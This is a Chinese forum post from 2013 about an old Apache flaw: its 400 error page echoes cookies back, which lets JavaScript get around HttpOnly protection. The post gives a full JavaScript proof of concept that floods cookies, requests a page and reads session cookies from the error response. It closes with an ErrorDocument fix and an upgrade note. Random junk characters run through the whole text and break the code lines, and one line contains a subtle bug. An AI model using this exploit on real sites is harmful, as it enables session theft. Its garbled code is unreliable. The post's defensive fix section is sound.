很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。8 W! @0 U+ f L# T3 h E; Q C
9 e4 i& I: k2 |
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:
8 G7 F5 q0 o- ?6 E$ V
, h% f( G# E6 A9 _- P
( d K! d0 W$ b* ~. M w J% J// http://www.exploit-db.com/exploits/18442// D, K; U+ {- j' i" X
function setCookies (good) {
" U: F1 G" p7 `7 J6 r7 J2 o/ { @// Construct string for cookie value; ^: y- k( k: F0 q# l: G) i) O
var str = "";
, O2 |. S5 a0 I8 G* Y' i0 h% afor (var i=0; i< 819; i++) {
' q# d1 [% K4 l& N& ?; H0 Q& pstr += "x";8 C8 ?- t4 j' F1 g8 y! Y2 l5 k2 p& a
}
; \- T- k4 A0 D, p// Set cookies0 L: f$ \( `7 K0 N8 G5 N. A- m
for (i = 0; i < 10; i++) {. q, l+ k. |; s! D' u7 ?: o
// Expire evil cookie9 z7 @* ^! d; v
if (good) {
- ]. ^! K4 a* h1 \var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
9 a$ r. t1 \. [6 o" t}
% j% M; b4 W9 i// Set evil cookie5 P Y7 y/ w8 d: X
else {
) c2 R1 Y, F. ?0 k0 qvar cookie = "xss"+i+"="+str+";path=/";
8 t" c! A& Z. _9 l}2 v( l! B C4 R
document.cookie = cookie;
\' ~, k# |6 Z/ b) d, L$ X}
4 L" k5 n1 R5 p# S9 \8 r}
1 J/ v5 @! I/ J, }function makeRequest() {
. \6 r( p6 N2 T& TsetCookies();
1 Q7 I* G$ a4 Z8 afunction parseCookies () {( C# V t: c) G ~, S6 @, f, A1 X
var cookie_dict = {};
$ T- C. w' u M9 `+ @) w// Only react on 400 status( z( e6 W# s2 d! u, q2 e
if (xhr.readyState === 4 && xhr.status === 400) {
G Y+ V6 T3 D, V// Replace newlines and match <pre> content
) e/ U' n4 d4 e3 ]var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);# o1 {* \: q) [6 `0 [& y
if (content.length) {3 B% h" T; Y; d; c# F
// Remove Cookie: prefix+ J% M1 u1 C, |% A
content = content[1].replace("Cookie: ", "");! M2 `* b `9 N: e
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);8 {9 {" ^' x; i( K8 ^% B
// Add cookies to object
) B7 n- B4 D: Rfor (var i=0; i<cookies.length; i++) {3 J6 u; F/ \1 G# k- Y
var s_c = cookies.split('=',2);4 O5 h: K/ H5 h" ^1 g6 c( S, c% o
cookie_dict[s_c[0]] = s_c[1];
5 d+ w4 v+ F- H; z# D0 x/ H. w}- c6 ^# z/ s. A8 {3 x7 m" }1 A
}3 d$ ^! b0 Q+ M& l/ u$ g+ y
// Unset malicious cookies
# b4 @- X- f$ s) H, QsetCookies(true);$ D) F0 G# n# W9 m; ^
alert(JSON.stringify(cookie_dict));( ?2 H- Y* T. Q$ h9 E' ]
}
0 X i( e9 S. |3 G$ h" t; w+ t}
) C, t; N5 k! F$ P/ X+ c2 r// Make XHR request
' O- N s# k8 `var xhr = new XMLHttpRequest();5 R( G' r3 C# U/ `
xhr.onreadystatechange = parseCookies;8 `! M& l+ x) ]$ b+ P
xhr.open("GET", "/", true);
+ {2 k! Y8 U% bxhr.send(null);6 q! F1 T7 }# Y) I
}
* V$ \& c1 x3 n1 q5 l6 fmakeRequest();
3 \" u$ E# j* J5 h
6 Y' v/ E9 z4 M# E7 K你就能看见华丽丽的400错误包含着cookie信息。
3 s) C- {3 X1 c8 ~8 R# {/ c
7 G& q* X2 I1 a& o5 Y" W下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#+ C+ B- g8 u4 P8 i! |, U6 o& ~! d
" P$ `9 \: j6 F0 [( `
修复方案:
( f; ~8 W* Z$ W
$ E3 F; @8 P0 W9 s- d0 b/ |- v% ]+ z' g% jApache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
- c3 d; J; G. z& @0 J* c B" x$ K' n, C
In the event of a problem or error, Apachecan be configured to do one of four things,5 z* L( d) ~1 A K* B
+ U; h7 V& h" O6 }& J6 W0 C1. output asimple hardcoded error message输出一个简单生硬的错误代码信息1 [$ Y+ h! l8 y3 N, `; n% m6 u
2. output acustomized message输出一段信息
& k# r* J' F$ ]3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面 . I0 a0 S3 _2 F* L4 D
4. redirect to an external URL to handle theproblem/error转向一个外部URL
3 T9 R! e' h R# B! R7 a: K! ]8 G/ d( R; T/ g' j' S
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容
: h# X' L4 o3 A' a& t
. D" |" D, M" M2 E. W ]Apache配置:6 ?! X; O: [- R e2 [
, d1 c2 ~3 }( J1 \
ErrorDocument400 " security test"
. o' Y/ w+ v1 [% h$ }6 \9 S8 D% X/ g, o1 q ? B+ c! x$ D' G2 ^0 w
当然,升级apache到最新也可:)。
" V, J8 j& C, ~3 _* p8 y( N x9 O* @0 ?/ O. L9 k( @1 Y
参考:http://httpd.apache.org/security/vulnerabilities_22.html% y9 h- c2 J. b
. F% N& |9 j' ~0 O+ { |
发表于 2013-4-19 19:15:43
收藏
支持
反对